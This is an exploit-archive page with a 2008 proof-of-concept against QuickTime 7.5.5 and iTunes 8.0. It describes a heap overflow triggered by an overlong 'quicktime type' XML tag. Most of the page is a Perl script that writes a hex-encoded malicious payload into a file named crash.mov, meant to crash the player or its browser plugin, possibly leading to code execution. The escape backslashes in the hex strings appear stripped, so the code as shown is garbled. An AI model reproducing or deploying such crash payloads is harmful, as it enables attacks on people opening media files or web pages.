QuickTime 7.5.5 / ITunes 8.0 Remote off by one Crash Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QuickTime 7.5.5 / ITunes 8.0 Remote off by one Crash Exploit
# Published : 2008-09-16
# Author : securfrog
# Previous Title : WonderWare SuiteLink 2.0 Remote Denial of Service Exploit (meta)
# Next Title : Postfix < 2.4.9, 2.5.5, 2.6-20080902 (.forward) Local DoS Exploit

###############################################################################
# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
#  
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for  a reconized header even if the header is not  corresponding
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
# remote crash on firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
my $payload =
"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x3f".
"x3ex0dx0ax3cx3fx71x75x69x63x6bx74x69x6dx65x20x74x79x70x65x3d".
"x22x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78x2dx71x75x69x63x6b".
"x74x69x6dx65x2dx6dx65x64x69x61x2dx6cx69x6ex6bx20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20".
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x22x3fx3e".
"x0dx0ax3cx65x6dx62x65x64x20x73x72x63x3dx22x72x74x73x70x3ax2f".
"x2fx6ex6fx73x69x74x65x2ex63x6fx6dx2fx6ex6fx76x69x64x7ax2ex6d".
"x6fx76x22x20x61x75x74x6fx70x6cx61x79x3dx22x77x68x61x74x65x76".
"x65x72x22x20x2fx3ex00";

my $file="crash.mov";
open(my $file, ">>$file") or die "Cannot open $file: $!";
print $file $payload;
close($file);

# www.Syue.com [2008-09-16]